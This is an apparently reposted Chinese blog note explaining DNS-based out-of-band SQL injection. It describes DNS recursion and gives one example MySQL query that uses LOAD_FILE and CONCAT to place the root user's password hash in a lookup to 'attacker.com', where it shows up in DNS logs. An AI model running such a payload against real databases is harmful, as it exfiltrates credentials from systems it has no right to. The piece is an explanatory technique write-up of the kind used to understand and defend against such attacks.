首页 > 代码库 > 另一种的SQL注入和DNS结合的技巧
另一种的SQL注入和DNS结合的技巧
这个技巧有些另类,当时某业界大佬提点了一下。当时真的真的没有理解到那种程度,现在可能也是没有理解到,但是我会努力。
本文章是理解于:http://netsecurity.51cto.com/art/201503/469621.htm
链接中的文章主要说的是什么?
先愉快的介绍了DNS工作原理,注意其中有一个术语叫做递归。这个是DNS服务关键的一部分。
这种攻击方式需要提前能查看DNS日志,利用SQL注入语句返回信息,迫使DNS递归,然后DNS日志的记录。
日志中就有SQL注入返回信息了。
例如:
SELECT LOAD_FILE(CONCAT(‘\\\\‘,(SELECT password FROM mysql.user WHERE user=‘root‘? LIMIT 1),‘.attacker.com\\foobar‘));
返回了:\\\\返回值(password).attacker.com\\foobar。触发了DNS递归,导致日志记录。
另一种的SQL注入和DNS结合的技巧
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。